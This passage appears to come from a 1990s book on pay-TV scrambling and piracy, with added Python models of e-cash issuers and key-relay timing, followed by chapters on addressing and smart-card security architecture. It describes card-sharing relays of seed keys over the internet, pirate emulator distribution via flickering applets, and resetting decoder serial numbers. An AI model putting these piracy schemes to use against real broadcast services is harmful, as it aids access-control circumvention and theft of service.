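    def withdraw(self, account: str, token: int) -> int:
        self.ledger[token] = account
        return rsa_sign(token)

    def deposit(self, token: int, sig: int) -> bool:
        if token not in self.ledger or token in self.spent:
            return False
        if not rsa_verify(token, sig):
            return False
        self.spent.add(token)
        return True

    def identify(self, token: int):
        return self.ledger.get(token)


def demo(seed: int = 1) -> dict:
    """Run one withdrawal and deposit through each issuer (constructed data)."""
    rng = random.Random(seed)
    blind = BlindIssuer(cap=100)
    t, s = blind_withdraw(blind, "alice", rng)
    blind_valid = blind.deposit(t, s)
    blind_double = blind.deposit(t, s)            # same coin again: refused
    blind_traced = blind.identify(t)              # None: no link to "alice"
    blind_forged = blind.deposit(t, (2 * s) % N)  # tampered signature: refused

    audit = AuditableIssuer()
    t2 = rng.randrange(2, N)
    s2 = audit.withdraw("bob", t2)
    audit_valid = audit.deposit(t2, s2)
    audit_double = audit.deposit(t2, s2)
    audit_traced = audit.identify(t2)             # "bob": full audit trail
    return {
        "blind_valid": blind_valid, "blind_double_spend": blind_double,
        "blind_traced": blind_traced, "blind_forged": blind_forged,
        "audit_valid": audit_valid, "audit_double_spend": audit_double,
        "audit_traced": audit_traced,
    }


if __name__ == "__main__":
    print(demo())
```

Both issuers reject a double spend and a tampered signature; the difference is only in `identify`: the blind issuer can count coins and validate them but cannot say who withdrew a given one, while the auditable issuer's ledger names the holder. Either model still rests entirely on the signing key staying secret, which is the point the next paragraphs make about the card.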


All of the above depends on security. The algorithms and keys have to be 
secure. The smart card has to be secure. A house of cards is just too bad a 
pun for this edifice. 


Now if satellite television piracy and hacking is made so illegal that there is 
no clear differentiation between hacking and real crime, what is to stop a 
hacker from going for the electronic cash cards? If there is no real 
differentiation, what is to stop a hacker from selling his discoveries to 
organised crime interests? 


Future Forms Of Piracy 


The architecture of the Blackbox industry is hierarchical. A few main 
companies at the top generally fund the research. They then either 
manufacture the pirate devices or sell the information on down the line. 
However this has changed over the last few years and the industry is 
becoming more diversified. 


The most recent innovation in the industry has been the Battery Card. This 
is a pirate smart card that is based on the Dallas 5002FP microcontroller. 
This chip has proven to be one of the more resilient chips on the market. 
Perhaps if channels paid more attention to what hackers and pirates use, 
they would be in a better position. 


The Battery Cards have a touch sensitive keypad. In the event of an ECM 
by a channel, the card’s manufacturer issues a set of numbers or letters 
which the card user then types into the card. After this the card works again. 
It cuts the effective lifetime of an ECM from a few days to a few hours. 


Of course this innovation was improved upon by a modem module. This 
module allowed the Battery Card user to connect his card to the phoneline 
and have it updated automatically. The effective lifetime of an ECM was 
further reduced as a result. 


The whole concept of having an updatable pirate device is not new. Indeed 
it has been in operation with VideoCipher II piracy in the USA for almost ten 
years now. The on-board modems were also largely an American innovation. 
But the main question facing the current services and prospective 
Digital Television services is the form of future piracy. 


There are two possible forms of piracy on existing services and Digital 
Television services. Both of them have already been tested experimentally 
with the existing scrambling systems and have been found to work. It is not 
so much a question of if these hacks will be implemented as when. 


Someone once said that the best way to predict the future is to invent it. 
While things I write about have a habit of coming true this is not to say that 
the hacks outlined below will. But I have the utmost confidence in the 
competence of committees. 


The following section requires a bit of a leap of imagination. It is set in the 
not too distant future. Think of the movie “Bladerunner” and you will get 
some of the atmosphere. 


Imagine, if you will, a European Community where the half-baked 
recommendations in the Green Paper have come to fruition. The legislation to 
cover up the mistakes in poorly designed systems has been implemented. It 
is now illegal to sell, buy or use a pirate device in the EU. For hackers, 
Europe has become a technological tyranny. 


To paraphrase Thomas Jefferson, the tree of liberty must be refreshed from 
time to time with the blood of patriots and tyrants. Those believers in liberty, 
the hackers, are getting caught on a regular basis. The court actions against 
hackers and pirates are now little more than production-line criminal 
convictions. Piracy on Digital Television systems is falling to an almost 
acceptable level. Then some hackers decide that it is time for some 
gardening. 


1. A SEASON Type Program 


Pirate hardware has become more difficult to transport in Europe. Hardware-based 
hacks are fading out of use. Importing pirate devices from outside the 
EU has also become more difficult. The European Customs have been 
forced by Directive to devote time to this problem instead of the spending it 
on more serious problems like drugs. 


But the problems of hackers and pirates are often similar to those faced by 
the channels under attack. The key issue is payment. After all, for a pirate to 
finance an attack on a service, there must be some guarantee of revenue. 
This is the rock upon which many a venture has been dashed. 


The solution to the problem is a software based hack. Among the many 
attractions of such a hack is one fundamental aspect. It is unstoppable. 
Since it is essentially a stream of bits, it can be transmitted by telephone 
line, by dial-up bulletin board (BBS), by internet. There is not a thing that the 
anti-piracy enforcement can do about it. 


Of course at this stage, you are probably wondering how the pirates can 
stop a SEASON type program from being spread all over the place without 
payment. With the SEASON emulator programs, anyone could get them off 
the internet and the BBSes and run them. The temporary solution that some 
pirates came up with was a dongle. The problem is that hardware 
distribution is difficult in this situation. 


The hacker solution to the problem is clever. It relies on the fact that each 
pirate program has been made unique. And for the user to redistribute his 
program would result in his conviction. After all, it would include his name, 
address, telephone number, e-mail and credit card details. 


Naturally such a program would have to be encrypted for transport over the 
internet and BBSes. The Pretty Good Privacy cryptography may be used for 
this. Hackers and pirates do not pay any attention to the morons in the 
European Commission who want to introduce a common cryptography 
standard. The result is that the encryption on the pirate software is too hard 
for the channels to crack. 


In the event of an ECM, an upgrade would be available via the internet and 
the BBSes. This would be patched into this SEASON type program. 


The SEASON program has been modified considerably since Markus Kuhn 
wrote the initial SEASON7 hack in 1994. The new SEASON program has 
been taken over by pirates and takes full advantage of the technology. 


The updates are based on light. The update patch for the SEASON program 
is distributed by means of a JAVA applet. It is a flickering light applet that 
just, well, flickers. The timing of the flickering transmits the update. This can 
be used with the newer generation of battery cards or interfaces that have a 
phototransistor update facility. It is simply a case of putting the battery card 
or interface up to the television screen or computer monitor to have it 
updated. 


The interface for the computer to decoder also includes such a light based 
interface. Let's call it "Firelyte". In this manner, the security of the situation is 
improved. There is no update patch as such (as an EXE or ZIP file) to be 
transmitted over the internet. The “Firelyte” applet will be hidden in many 
sites over the internet. Anyone could find them with their WWW browser. 
The beautiful part about all of this is that the new Digital IRDs actually 
distribute the patch over their internet connection option. 


Some commentators have said that the Digital Television IRDs will be used 
for internet delivery. What better way for the hackers and pirates to deliver 
the pirate SEASON program and the patches? 


The proposals to have the ownership of pirate devices and pirate digital 
television IRDs made a criminal offence and to have the devices subject to 
seizure are really insane when taken with the above hack. Since the digital 
IRD downloads the JAVA applet and runs it, it would hypothetically become 
a pirate device and therefore subject to seizure. It would follow, 
hypothetically speaking, that all IRDs that run this applet become pirate devices. 
Therefore it might be possible to wipe out a market. 


If one service decides that another service is becoming too difficult to 
compete with, it may develop a virus that would open all channels on the 
opposing service's IRD. By downloading this virus they would render all the 
opposing service's IRD's liable to seizure. Perhaps the best day to execute 
such an attack would be on April first. 


2. The McCormac Hack - The Digital Version 


For those still unfamiliar with the McCormac Hack theory, here is a brief 
explanation. The hack was first published in 1989 as a hypothetical attack 
on VideoCrypt. It worked perfectly - otherwise I would probably not have 
published it. If a live datastream can be lifted from a validated decoder and 
used to activate other decoders, the system is compromised. Applied to 
smart cards, this means if the datastream from one validated card can be 
transmitted and used in other decoders, then that system is insecure. All of 
the current systems in operation are, by this definition, compromised. 


Theoretically the IRDs or decoders would have to share the same identity 
number but that is the easy part. It is possible to zero the decoder's identity 
register and give it a new identity number. It is a common practice with the 
DSS pirate cards that reprogram the IRD to the same serial number as the 
pirate card. 


The original theory envisaged the distribution of the datastream via radio 
transmitters, modems and cable. Of course with the proliferation of the 
internet, a ready made path exists. 


The primary difference between the 1989 and the digital versions of the 
hack is that the internet is used to route the seed keys. The original theory 
had a radio connection for distribution. There is apparently a radio based 
version of the hack in operation in Spain on an MMDS network. 


In the digital version, the theory is that the dataflow between a legitimate 
smart card and a decoder will be monitored via a Season type interface. 
The PC would then rebroadcast the keys via the internet to a number of 
satellite PCs. The satellite PCs would have their own Season type interface 
which would be hooked into a decoder or IRD running on the same channel 
as the master. 


Of course the disadvantage is that only one channel can be handled at any 
given time. It would be possible for the same kind of setup to be duplicated 
for each channel. As a result all of the premium channels could be hacked. 


In order to run such an operation, a multitasking operating system would be 
required by the PC. This rules out DOS and Windows. The most likely 
candidate for this type of operation would be Linux. Hypothetically, Windows 
95 could be used. 


The most critical aspect of such a hack would be the routing time between 
the server PC and the satellite PCs. If this is too great then the seed will not 
arrive in time. The time taken for routing can easily be established with a 
traceroute command. 


The main traffic on the internet link would be the seeds and the ZKT tests. 
However it might be possible for News Datacom to make the 74 packets 
interdependent and perhaps to tighten up the timing. EuroCrypt-M, with its 
long cycle of 10.24 seconds, is completely vulnerable to this type of hack. 
Given the way that the committee-designed EuroCrypt-M turned out, will DVB 
fare better? Even though the DVB will not be designing the actual 
access control system, the fact that they are involved in designing the 
platform points to the fact that the access control module to scrambling 
section interface will be vulnerable. 
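

The timing argument above can be put into numbers. What follows is an added Python model, not from the book and not a description of any real system, written from the point of view of a service operator sizing the "tighten up the timing" countermeasure. It assumes that a key is valid for one crypto period, that a legitimate card holds each key `lead` seconds before the period starts, and that a receiver depending on relayed keys loses whatever part of the period passes before the relayed key arrives. The latency figures are constructed; the 10.24-second period is the EuroCrypt-M figure quoted in the text, and the shorter periods are hypothetical.

```python
"""Constructed model: viewing loss for a relay-dependent receiver as a
function of crypto period, key lead time and relay latency.

Nothing here talks to a decoder or a network; it only evaluates how much a
given period and lead time leave for a key that has to cross a network first.
"""
import random


def relayed_outage(period_s: float, lead_s: float, latencies_s) -> float:
    """Average fraction of each crypto period a relay-dependent receiver
    cannot descramble. A key that arrives `late = latency - lead` seconds
    after the period starts blanks min(late, period) seconds of it."""
    total = 0.0
    for lat in latencies_s:
        late = max(0.0, lat - lead_s)
        total += min(late, period_s) / period_s
    return total / len(latencies_s)


def constructed_latencies(n: int, mean_s: float, jitter_s: float, seed: int = 0):
    """Gaussian latency samples clipped at zero (constructed, not measured)."""
    rng = random.Random(seed)
    return [max(0.0, rng.gauss(mean_s, jitter_s)) for _ in range(n)]


def compare(periods_s=(10.24, 1.0, 0.2), lead_s=0.0, mean_s=0.25, jitter_s=0.05):
    """Outage per period length at a fixed lead time, using constructed
    latencies: the longer the period, the less a relayed key loses."""
    lat = constructed_latencies(2000, mean_s, jitter_s)
    return {p: round(relayed_outage(p, lead_s, lat), 3) for p in periods_s}


def max_lead_for_outage(period_s: float, latencies_s, target: float):
    """Largest lead time, in 10 ms steps, at which relayed viewing is still
    degraded by at least `target` (fraction of time). This is the operator's
    budget for how far ahead of use a key may be delivered to cards.
    Returns None if even zero lead does not reach the target."""
    if target <= 0:
        raise ValueError("target must be a positive fraction")
    eps = 1e-9
    if relayed_outage(period_s, 0.0, latencies_s) < target - eps:
        return None
    lead_ms = 0
    while relayed_outage(period_s, (lead_ms + 10) / 1000, latencies_s) >= target - eps:
        lead_ms += 10
    return lead_ms / 1000


if __name__ == "__main__":
    print(compare())
    lat = constructed_latencies(2000, 0.25, 0.05)
    print("lead budget at 1 s period for >=50% loss:",
          max_lead_for_outage(1.0, lat, 0.5))
```

With a 10.24-second period a quarter-second relay latency costs the relayed receiver only a couple of percent of each period, which is why the text calls that cycle vulnerable; at a period comparable to the latency the loss approaches the whole period. `max_lead_for_outage` turns that round: given a latency distribution it reports how early keys may be pushed to legitimate cards before the relay catches up again.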


The software for this hack might take the form of an Internet Phone type 
application using a form of pseudo IRC to distribute the seed keys. Since 
the VideoCrypt system in Europe is not reliant on the IRD or the decoder 
having a serial number the hack would probably work without hassle on any 
decoder. However applying this type of hack to DSS would require all IRDs 
to have the same serial number. This is apparently easy to achieve as most 
of the pirate DSS cards now automatically reprogram the IRD's serial 
number when they are inserted. 


Back to the present! It seems that the recent moves against the hackers 
and pirates in Europe and North America have made the requirement of a 
secure distribution channel a necessity for survival. In reality, the Next 
Generation Season type hack is best suited to this as it can be distributed 
via the internet and the BBSes from outside the target jurisdiction. 


Divergence Or Convergence? 


The term “convergence” is a buzz word much in favour with the marketing 
people. The concept is that all of the transmission media are coming 
together. Things in the real world are slightly less clear. 


For the Blackbox industry, the strategy of "United We Stand - Divided We 
Fall” has been a recipe for disaster. In the business of scrambling systems, 
the more variety the less risk there is that a single hack will have a 
widespread effect. It is more a case of compartmentalised risk. Even after 
all the scrambling systems failures of the last few years, there are still idiots 
who believe in a single encryption system. Again real time experience is 
sadly lacking among them. 


It would be easy to apply the rules of evolution to this situation. Put simply, it 
will be the survival of the fittest. The system that can adapt and cope with 
hacking and the market demands will be the survivor. If a system is 
considered as a species, then it must continue to evolve and adapt to its 
environment. If it remains static then it becomes extinct. 


The scrambling systems of the past few years are moving towards a 
non-static or fluid architecture. The smart card was evidence of this. In the 
event of a hack on the system, the smart card could be replaced. Of course 
the theory of the detachable secure processor has been dealt a cruel blow 
by economics. If the number of cards being used on a particular system 
becomes too large then replacing them may be prohibitive. 


Some channel executives regard piracy as a form of disease. For some of 
them it is a simple emotional response without any deep underlying logic. 
Strangely the concept of piracy as a disease or virus is a good one and 
perhaps a very accurate one. It also ties in nicely with the theory of evolution 
as applied to scrambling systems. 


If a hack is considered as a virus then the countermeasure is effectively the 
cure. Over a period a system will, like a biological system or organism, build 
up a defence against various types of hacks. This would come about as the 
various countermeasures are added to the system's datastream. 


If there is some diversity in the implementation of the system then some of 
the hacks would only affect a few implementations. Of course there is 
always the potential for a Holy Grail hack. Such a hack would bring the 
system crashing down regardless of the differences between implementations. 
In human terms it would have the same potential as rabies. Except 
in this case only the executives of the hacked channels and system 
manufacturers foam at the mouth. 


Of course there are other factors involved here. A successful virus does not 
kill its host immediately. If it did so, then it could not spread and would die 
out. This is perhaps the self-defeating aspect of the Holy Grail hack. It is a 
victim of its own success. The channels using the hacked system will have 
their main fee gathering mechanism destroyed. As a result they may not 
survive. 


The Ho Lee Fook hack can be classified as a Holy Grail hack. It affected all 
of the major implementations of VideoCrypt in Europe. Since the original Ho 
Lee Fook hack on the 07 Sky card, all of the subsequent card issues, including 
the current 10 card (0A), have been hacked. DSS, a variant that built heavily 
on the 09 Sky card and the VideoCrypt-2 card, fell to the hackers. 


The Card Tricks hack on D2-MAC EuroCrypt-M was similarly a Holy Grail 
hack. While this system has far more potential than VideoCrypt it has a fatal 
flaw. It is a committee-designed system. Sometimes you get the impression 
that the people on all these wonderful committees would, much to the horror 
of Humanity, have difficulty in operating a condom vending machine without 
a two hundred page specification document. 


The details of almost everything in this system except the hash algorithm 
were available. This fact alone gave hackers a very good insight into the 
operation of the system and led, eventually, to the hack. 


Of course the EuroCrypt-M system is more complex in implementation and 
security than VideoCrypt. When you read the EuroCrypt specification 
document, it is easy to appreciate the complexity, elegance and clumsiness 
of the system. There are many more possibilities for this system and it was 
such a shame that it based its security on a flaw; the designers did not 
envisage the smart card being hacked. 


Like VideoCrypt, the EuroCrypt-M system is smart card based. The main 
action that the users of the EuroCrypt-M system have taken against the 
hackers has mainly been electronic countermeasures. These have been 
marginally successful. The hackers generally had solutions within a few hours 
though sometimes it can take a few weeks. 


Some rather naive people have claimed that when digital television arrives 
hackers will disappear because it will be too difficult to hack. Yeah right! The 
same people, or their predecessors said the same thing about smart cards 
and VideoCrypt. The same people believe in unbreakable codes and 
publicity brochures. 


The best way to consider digital television is as a set of languages. 
Languages evolve. From a number of root tongues, the present multitude of 
languages sprung over the millennia. Dialects turned into languages. Words 
dropped out of usage and were replaced with new ones. Only the words that 
are in continued widespread usage tend to survive. 


Digital television is meant to be, to some at least, like some all unifying 
single language. To paraphrase the BBC motto; “and nation shall speak 
peace unto nation and perhaps get a comprehensible reply". However nice 
this would be, digital television is, in effect, a Tower of Babel for the 
twenty-first century. 


Whereas at first it will create the illusion of a single standard, whether it be a 
European standard, an American standard or even a Pacific Rim standard, 
it will rapidly diversify. Diversify is the best word here as degenerate has 
more of a backwards feel. The diversification will be more in the form of an 
evolution. 


The persistent, and perhaps many would argue fatal, problem of the 
systems developed in the late eighties and early nineties has been the 
"Frozen Architecture". To make a rather bad pun, the security or scrambling 
system is, once it leaves the development stage, etched in stone. 


There is very little that can be done to fix a hack on such a system. Over the 
nineteen eighties this fact became clearer and the embedded secure 
processor approach to system design was replaced with the detachable 
secure processor approach. The detachable secure process or smart card 
approach, though far short of the ideal, was a significant move away from 
the “Frozen Architecture”. 


Digital television systems have the necessary specification to be employed 
as “Fluid Architecture” systems. While there would be a common or root 
infrastructure, the main access control module would be more fluid. It could 
be changed in the event of a major hack that a smart card upgrade alone 
would not fix. The smart card upgrade would of course still be a low cost 
option. 


There are two proposed encryption systems for Digital Television: MultiCrypt 
and SimulCrypt. Of the two MultiCrypt is the best. The philosophy 
behind SimulCrypt has got to be that of a complete idiot - one hack and it is 
all hacked. Of course the people defending this proposed system seem to 
believe that they will be able to defeat the hackers and pirates. Of course 
this did not work in the past. 


Digital television, however, is only a medium. What will protect the signals is 
the security overlay. If this overlay is insecure then it will be hacked. For 
example, the VideoGuard system is the pay television security overlay 
developed by News Datacom. The analogue implementation is called 
VideoCrypt. A different implementation is used to provide the security on the 
DirecTv system in the USA. That too was hacked. 


Other digital television systems are also under development. What may well 
occur is some form of standards battle like that of VHS and Betamax. In 
either case the security of the system may be the factor that decides the 
battle. 


The munitions in this battle will not be the programming, the movies and 
television programmes. It will be the internet. Whichever system can 
facilitate the delivery of internet services in the best, simplest and most 
user-friendly manner will probably win. 


At this point in time it is very hard to believe in such a thing as a totally 
secure system. The purposes of a scrambling system are to prevent all but 
the most elegant of hacks and limit the effects of that most elegant of hacks 
- the Holy Grail. 


This simple lesson of scrambling system design has been ignored once too 
often. Publicity brochures are filled with inane claims that the manufacturing 
company are pro-actively involved maintaining the security of the system. 
Such claims are generally only the product of a marketing meeting. What 
they are really trying to say is that they cannot guarantee the security of their 
system. 


It is impossible for any scrambling system manufacturer to truthfully 
guarantee his system. To do so would rule out any future development or 
discovery. Of course the marketing and PR people have to have some little 
bit of prestidigitation for the poor fools about to buy the system. 


In a somewhat romantic rationalisation, hacking could be the last vestige of 
a free society. In the USA, the government tried and failed to impose the 
Clipper chip on the public. It seems to be a part of a general move towards a 
big brother situation where there are no secrets from the government and 
cryptography is controlled. The rumblings of similar actions here in Europe 
have already been heard. The Council Of Europe seem intent on trying to 
impose a common encryption algorithm on Europe complete with backdoors 
so that the governments could eavesdrop on the private communications 
of citizens. These people are fools and dangerous ones at that. They 
seek to take away our freedom and logically have to be stopped - 
democratically of course. 


It looks like some politicians would like to control what we say and think just 
as some idiots in the broadcasting industry think that there should be a 
single unified scrambling system. 


Fools try to control chaos and in the end the chaos consumes them. It looks 
like those who would impose such restraints on privacy do not appreciate 
the long term effects of their actions. 


A single system only requires a single hack. From that point on, everything 
looks to be a rearguard action. While the hack may not occur immediately, it 
will occur. 


The more protected something is - the more of a challenge it is. When a 
system is portrayed as being impossible to hack, every hacker believes that 
it is only a temporary impossibility. Perhaps it is this sheer optimism that 
allies hackers with addictive gamblers. We all believe in, and often depend 
on, luck. 


Almost invariably this belief in luck pays off. Systems are hacked because 
someone overestimates the security of a component or, as is more 
frequently the case, someone makes a mistake. 


The players change but the game remains the same. It is stupid to claim 
that piracy will be eliminated, for if there was no crime then there would be 
no need for a police force and we'd all be vegetarian troglodytes. This is the 
real world - wake up and smell the coffee! 
Information is the most valuable weapon in the arsenal of a hacker. 
With knowledge of all previous systems, a new system can be 
quickly cross-checked and identified. Of most import, the weaknesses 
of the system can be detected. 


All hackers tend to amass a rather untidy collection of magazine 
articles, notes and manufacturer’s brochures. Very few hackers are 
over-enthusiastic about having everything filed away under relevant 
titles. In fact most of us tend to prefer the stable chaos system of 
filing. 


The stable chaos system of filing is where things are dumped in 
piles. Since the locations of the piles are governed by fuzzy logic, (as 
used by the mind), it is easier to locate some article that you read 
five years ago. Of course this is one hell of an excuse to use when 
some one accuses you of being untidy. It is so improbable that it is 
perfectly plausible and perhaps true. 


The objective of this chapter is to explore the principles and processes of 
scrambling systems. The first section is an introduction to the concepts of 
scrambling. The second section is a collection of case studies that illustrate 
the principles, processes and failures of various systems. 


The security of satellite transmissions is a complex topic. It combines many 
disciplines such as mathematics, psychology, and electronics. It also 
requires cunning and guile in large doses. To put it simply, it is the art of 
getting paid for a transmission. 


A scrambling signal is meant to protect an investment by the programme 
provider who pays for the copyright on a movie or series. In order to recover 
the costs and make a profit, he has to sell the programme on to a 
consumer. The consumer will pay for the right to watch the programme. The 
scrambling system is there to make sure that the consumer pays. 


The overriding concern when scrambling a signal is not the innate security of 
the system but rather the ease with which the system allows the revenue to 
be extracted. In effect it is all a sequence of compromises. 


The first and perhaps the most important compromise is cost based. For a 
large network of hundreds of thousands of subscribers, an economy of 
scale would exist. A highly secure system could be employed as the 
discounts for ordering in large quantities would make the decoders appear 
cheap or at least less costly. At the opposite end of the scale, a network with 
only a few thousand subscribers would not be in a position to afford a highly 
secure system. The main factor that influences this is the fee that the 
subscriber will pay. 


The VideoCrypt system used by BSkyB is an excellent example of the 
economy of scale. There are about 8 million VideoCrypt decoders throughout 
Europe. Initially the only available format was a stand-alone decoder but 
various receiver manufacturers integrated the decoders into their receiver 
designs. The price of a stand-alone decoder now is in the region of £80. 
Most of the original stand-alone decoders ended up in mainland Europe 
where it is not legally possible to subscribe to BSkyB. 


This is a side effect of the cheap decoder. A potential pirate market is 
created for the channel's programming outside of the copyright area by the 
basic fact that the decoder is cheap. Now whether this market develops into 
a full blown pirate market or a Gray Market is a matter for the security of the 
system. 


If the subscription fee is high enough then the economy of scale model is 
turned around. It is necessary to protect the highest value programming with 
good security. A good example of this is the B-MAC system used by SIS 
Racing Channel in Europe. Though the system is hacked, the pirate 
decoders are selling for £1800. Even an unmodified decoder will cost about 
£600. The programming on this channel is high value and few are willing to 
pay £1800 for one channel. 


Like all technology, scrambling systems have finite lifetimes. This disturbing 
fact did not dawn on those responsible for choosing scrambling systems in 
the early eighties. After all it was a relatively hack free period since the 
information and skills required to hack services were not that widespread. 
Of course a more important fact underlying this was that most of the people 
selecting these systems had only previously worked in cable television. In 
cable television, things move at a glacial pace and a system was often 
expected to have a lifetime of ten or fifteen years. 


In addition to the above, the people selecting the systems seem to have 
accepted the manufacturer's propaganda that it would be possible to 
upgrade the decoder in the event of any hack. This mode of thought can be 
seen most clearly in the Embedded Secure Microcontroller architecture 
covered later in this chapter. 


In Europe, at least, there were no services via satellite that could be 
considered of truly Pan-European attraction until about 1985. The majority 
of any scrambling was cable based. The people responsible for choosing 
the system ran their calculations in terms of the cheapest available system 
and an operational lifetime of ten years or so. Towards the end of the 
eighties, this mode of thinking was being killed by reality. There were 
satellite based services that were being hacked to pieces and Pay TV 
executives were scurrying about in abject panic trying to convince themselves 
and the media that piracy was not a real problem. 


This situation forced a rethink of strategies and technology. The move was 
to the finite lifetime system. As the technological skills and resources of the 
Blackbox industry advanced, the complexity of the scrambling systems had 
to be one step ahead. It had to be possible for the system to be completely 
overhauled if necessary and it frequently was. The best illustration of this 
was the move to smart card based systems. 


What Is A Scrambling System? 


Most manufacturers of systems would prefer that everyone had an image of 
a scrambling system as a black box. The signal would enter one side and 
emerge from another scrambled. This model is a lot easier for the 
manufacturers' salespeople since they don't have to memorise the facts. However, a 
scrambling system is a rather generic term for a complex operation that 
involves more than just the techniques used to render the picture 
unwatchable or the sound inaudible. There are three parts to each system; 
the addressing, the security architecture, and the techniques. 
The Addressing Element 


There are basically two formats of system: addressable and non-addressable. 
The more cynical would consider these as being addressable and 
dead. 


In any pay television operation of over a few thousand subscribers and 
reasonably valuable programming, an addressable scrambling system is 
essential. It gives the channel some control over who watches and who 
doesn’t. The alternative is a non-addressable system and probable failure. 


If the channel has no control over the subscriber's decoder then the 
subscriber can watch the programming after the subscription expires. 
Stolen decoders could be recycled without the knowledge of the channel. 
Perhaps more importantly from a copyrights point of view, these decoders 
could be shifted outside the original copyright area. This would create legal 
as well as security problems for the channel. 


Of course in defence of the non-addressable system, it is perhaps the 
fastest and cheapest method of getting a channel on air. This approach has 
been used in Europe to launch a few channels. Red Hot Dutch, a hardcore 
porn channel, used the SAVE system to get their service on air with the 
intention of switching to a more secure system within six months of the 
start-up. Reality cruelly skewed their plans and the channel collapsed. Of 
course the collapse owed more to the channel's management than to 
piracy. 


A major factor in this was that the SAVE system had been widely hacked in 
Europe for at least five years before their launch. Therefore there was an 
existing base of easily modified decoders available - it was just a case of 
changing a crystal. The frequency of the crystal chosen was a readily 
available one. As a direct result, many of the defunct pirate SAVE decoders 
were given a new lease of life for less than a pound. The problem for Red 
Hot Dutch was that they had no control over this pirate market. 


Had Red Hot Dutch gone for an addressable system from the start, things 
might have been slightly different. It would have taken longer to hack the 
system. In the longer hack timeframe, the channel would have had a 
chance to get up and running. With a non-addressable system, the only 
thing preventing a complete disaster is the security of the techniques used 
to scramble the signal. Once the scrambling system is hacked, the channel 
is doomed. 
Inclusion Or Exclusion Principle 


A scrambling system works by including all authorised decoders or by 
excluding all unauthorised decoders. This, on the surface may seem 
paradoxical because a scrambling system should do both. However on 
closer inspection, things become clear. 


In a system working on the Inclusion Principle, only those decoders that 
have been authorised and continue to be kept alive with a heartbeat signal 
will work. The heartbeat signal has to be received by the decoder otherwise 
it will shutdown. 


This type of system is more suited to a high bandwidth addressing system 
as each authorised decoder has to receive the heartbeat. 


The Exclusion Principle is the inverse. An authorised decoder will continue 
to work until it receives a drop-dead or kill signal. The IDs of the decoders to 
be switched off are transmitted in a sequence known as a Blacklist. 
Depending on the number of decoders to be switched off, the blacklist can 
be resent every few hours. 


In terms of bandwidth, this approach is more economic as it does not clutter 
the bandwidth with activation data. 


In Band Addressing 


The simple definition for In Band Addressing is that the addressing data is 
carried in the bandwidth of the scrambled signal. The typical area for the 
addressing data is in the Vertical Blanking Interval along with the VITS and 
teletext data. This form of addressing is also referred to as In Signal 
Addressing. 


Most of the systems on the market at present use this format of addressing. 
It is better suited to satellite transmissions as the data is part of the video 
bandwidth. 


With most of the newer systems on the market tending to be digital systems, 
they naturally can use the bandwidth of the channel more efficiently. 
Therefore they tend to use addressing techniques that would be termed 
In-Band. 


Out Of Band Addressing 


Out of Band Addressing means that the addressing data is transmitted 
outside of the normal video channel bandwidth. Generally a separate data 
carrier is transmitted along with the signal. This type of addressing was 
used in the old FilmNet SATPAC system on satellite. Nowadays it is limited 
to cable based scrambling systems such as the Jerrold Tri-Mode system. 


[Figure] A Simplified Illustration Of The Inclusion Principle: the headend 
transmits a heartbeat signal to the authorised decoders. A whitelist of 
active decoders is sent; a decoder that receives no heartbeat signal becomes 
inactive. This principle is well suited to the high bandwidth systems such 
as D2-MAC. The security weakness of this principle is that someone can 
replicate the heartbeat signal of the headend. 


[Figure] A Simplified Illustration Of The Exclusion Principle: the headend 
transmits a kill signal to unauthorised decoders. The IDs of the blacklisted 
decoders are transmitted; all other decoders remain active until they 
receive the kill signal addressed to them. The possible security weakness 
is that someone may find out how to block the kill signal. 


The old FilmNet SATPAC system was a classic example of this format of 
addressing. It was essentially a cable based scrambling system that had 
been pushed into operation as a satellite based system. The authorisation 
datastream was transmitted on a subcarrier as were the resynching pulses. 


The Security Architecture Of A System 


The security architecture of a system determines how easy it is to recover 
from a hack. There are essentially two types of architecture; Embedded 
Secure Microcontroller and Detachable Secure Microcontroller. In many 
respects they reflect the thinking of different decades. The microcontroller is 
a version of microprocessor that has on chip ROM, EPROM and/or 
EEPROM. It handles the access control in the decoder, processing the 
control signals and turning on or off channels. 


Embedded Secure Microcontroller 


The Embedded Secure Microcontroller is an architecture where the main 
decoder control is embedded in the circuitry of the decoder itself. All of the 
system's secrets are held in the decoder. This is the method that was 
favoured from the seventies to the late eighties. It is also the most vulnerable 
architecture and is based on the fallacy that there is such a thing as a 
secure chip. 


Security in scrambling systems is fleeting. A chip can only be considered 
secure for a few months or a year at best. With commercially available 
expertise in popping chips, the likelihood of a widely used chip remaining 
secure is small. 


This kind of thinking dominated scrambling systems design up to about 
1988. It can be seen in decoder designs like the FilmNet SATPAC system, 
the Jerrold Starcom system, the VideoCipher Il system and the Scientific 
Atlanta B-MAC system. Of course all of these examples have one thing in 
common - they are all hacked. The hacks demonstrate the fundamental 
problem with the Embedded Secure Microcontroller architecture. Once 
there is a confirmed hack, it is difficult and expensive to upgrade all of the 
affected decoders. 


2: The Principles Of Security 


The decoder is also under the complete control of the subscriber. The 
subscriber can theoretically open and examine the decoder. In the worst 
case he can modify the operation of the decoder and there is very little that 
can be done about it when this happens. 


The problem with an Embedded Secure Microcontroller approach to 
decoder architecture is that it is very expensive to recover from a hack. 
Each decoder would have to be modified by the channel. Naturally there are 
some who would put forth the argument that the hacked decoders could be 
updated over the air by the channel. The problem here is that once an 
Embedded Secure Microcontroller architecture decoder is hacked, it stays 
hacked. The hacker can watch whatever update is downloaded over the air 
and modify his hack to suit. 


Admittedly, the majority of systems now using this type of architecture are 
cable based scrambling systems. Cable based scrambling systems are 
better protected by legislation as they do not generally involve transnational 
coverage. Small cable systems in particular tend to go for the cheaper 
and less secure architecture strictly on the basis of cost. 


Detachable Secure Microcontroller 


The Detachable Secure Microcontroller was meant to work around the 
problems associated with the Embedded Secure Microcontroller architecture. 
It would allow the central element in the access control architecture to 
be detached and cheaply upgraded. This is the concept of the smart card. 


In this model, the decoder is dumb in that it does not hold any of the 
system's secrets. Therefore a hack on the decoder would not benefit a 
hacker. It is the smart card that has to be hacked. According to this model, if 
the smart card is hacked, it can be cheaply replaced. 


Of course this model works well on paper but is cruelly skewed by reality. 
For a large network with millions of subscribers, changing to a new smart 
card is a case of spending tens of millions of dollars. One flaw is that if the 
card is hacked, then the new card has to be a more secure version and 
naturally more expensive. The sheer scale of the expense means that it can 
be somewhat less than economical to upgrade every few months. 


As a direct result, the new card will be hacked within about four to six 
months. For example in the VideoCrypt system, it was initially intended that 
the card would be changed every three to six months. It would have been 
difficult to market a hack within this kind of timeframe. However when the 
sheer cost of the upgrades struck the accountants, the users of the system, 
BSkyB, tried to get about sixteen months to eighteen months from each 
smart card. It seems that in the last few card issues, the card has been 
